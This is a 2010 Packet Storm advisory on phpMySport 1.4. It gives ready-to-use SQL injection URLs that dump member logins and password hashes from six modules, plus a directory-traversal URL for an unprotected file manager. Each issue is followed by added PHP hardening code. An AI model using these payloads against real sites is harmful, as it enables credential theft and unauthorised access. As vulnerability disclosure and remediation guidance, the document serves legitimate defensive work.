phpMySport 1.4 SQL Injection

2010-01-18T00:00:00
ID PACKETSTORM:85338
Type packetstorm
Reporter Amol Naik
Modified 2010-01-18T00:00:00

Description

                                        
#######################################################################  
Multiple Vulnerabilities in phpMySport v1.4  
  
Name Multiple Vulnerabilities in phpMySport  
Systems Affected phpMySport v1.4  
site http://phpmysport.sourceforge.net/en/  
Author Amol Naik (amolnaik4[at]gmail.com)  
Date 18/01/2010  
#######################################################################  
  
  
############  
OVERVIEW  
############  
  
phpMySport v1.4 is vulnerable to the following issues:  
  
1. Multiple SQL Injection  
2. Unprotected Access to File Manager  
  
####################  
Technical Details  
####################  
  
1. Multiple SQL Injection:  
  
Multiple SQL injection instances exist in phpMySport v1.4 when "magic_quotes_gpc = OFF"; the PoC URLs below inject through the v1/v2 request parameters of each listed module.  
  
PoC:  
+++++  
  
http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-  
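The pattern behind this issue and its fix, as an added example in PHP that is not phpMySport's own code: a lookup that splices the request parameter into the query text is exploitable exactly when nothing escapes the quote (the magic_quotes_gpc = OFF case the advisory names), while a prepared statement keeps the value out of the SQL grammar regardless of that setting. The table name pms_member and the parameter v2 come from the PoC URLs above; the column name member_id, the function names, the mysqli driver and the database credentials are assumptions.

```php
<?php
// Added example, not phpMySport's own code. Table name pms_member is from the
// advisory; column member_id, function names and credentials are assumptions.

// Vulnerable pattern: the request value becomes part of the SQL statement.
// With magic_quotes_gpc = OFF the leading quote in the PoC value closes the
// string literal and the rest (AND 1=2 UNION ALL SELECT ...) is executed.
function fetchMemberUnsafe(mysqli $db, string $memberId): ?array
{
    $sql = "SELECT * FROM pms_member WHERE member_id = '$memberId'";
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened form: the value is bound as a parameter, so it is compared as data
// and can never change the shape of the query, with or without magic quotes.
function fetchMemberSafe(mysqli $db, string $memberId): ?array
{
    $stmt = $db->prepare('SELECT * FROM pms_member WHERE member_id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $memberId);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// Additional input check: when the identifier is known to be numeric, reject
// anything else before it reaches the database at all.
function requireIntParam(array $get, string $name): int
{
    if (!isset($get[$name]) || !ctype_digit((string) $get[$name])) {
        http_response_code(400);
        exit('invalid parameter');
    }
    return (int) $get[$name];
}

// Constructed request shaped like the advisory's PoC. The unsafe function
// would execute the UNION; the safe one looks for a member whose id literally
// equals that string and finds nothing.
$db = new mysqli('localhost', 'pms_user', 'pms_pass', 'phpmysport'); // assumed
$v2 = "' AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8 FROM pms_member-- -";
var_dump(fetchMemberSafe($db, $v2)); // NULL: treated as data, not as SQL
```

Relying on magic_quotes_gpc (removed in PHP 5.4) was never a fix: it only escapes quotes in GET/POST/COOKIE values and does nothing for numeric contexts or values that arrive by other routes, whereas parameter binding holds for every call site that uses it.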
  
  
  
2. Unprotected Access to File Manager:  
  
Access to the file manager is unprotected, and by using dot-dot-slash sequences (/../../) in the folder parameter it is possible to view the directory structure of the target system.  
  
PoC:  
+++++  
  
http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop  
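How a file manager action can be closed against both halves of this issue, as an added example in PHP that is not phpMySport's own code: the request must belong to an authenticated session, and the requested folder is canonicalised with realpath() and then rejected unless it lies under the upload root, so the /../../../ value from the PoC is refused rather than listed. The parameter name current_folder is taken from the PoC URL; the upload root path, the session key member_id and the function names are assumptions.

```php
<?php
// Added example, not phpMySport's own code. The parameter current_folder is
// from the advisory; the upload root, session key and function names are
// assumptions.

const PMS_UPLOAD_ROOT = '/var/www/phpmysport/uploads'; // assumed location

// Resolve the requested folder and refuse anything outside the upload root.
// realpath() collapses /../ segments and symlinks, so the containment check is
// made on the canonical path rather than on the raw string the user supplied.
function resolveFolder(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    $candidate = realpath($rootReal . '/' . ltrim($requested, '/'));
    if ($candidate === false) {
        return null; // folder does not exist
    }
    // Accept the root itself or a path strictly beneath it. Comparing against
    // the root plus a separator stops "/var/www/uploads2" matching "/var/www/uploads".
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the root via ../ or a symlink
    }
    return $candidate;
}

// The file manager must not be reachable without a logged-in member.
function requireLogin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['member_id'])) { // assumed session key
        http_response_code(403);
        exit('login required');
    }
}

// Directory listing that only ever sees a folder resolveFolder() accepted.
function listFolder(string $root, string $requested): array
{
    $folder = resolveFolder($root, $requested);
    if ($folder === null) {
        http_response_code(400);
        exit('invalid folder');
    }
    return array_values(array_diff(scandir($folder), ['.', '..']));
}

// Usage inside the file_manager action:
requireLogin();
$entries = listFolder(PMS_UPLOAD_ROOT, $_GET['current_folder'] ?? '/');
// With the PoC value "/../../../", resolveFolder() canonicalises the path to a
// directory above the upload root, the prefix check fails and the request is
// rejected instead of exposing the server's directory structure.
```

Because the check runs on the resolved path, it also covers encoded or doubled separators and symlinks inside the upload tree that point elsewhere, which a string search for "../" in the raw parameter would miss.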
  
  
#############  
TimeLine  
#############  
  
Bug Discovered: 01/01/2010  
Informed Vendor: 09/01/2010 -- no response received  
Public Disclosure: 18/01/2010  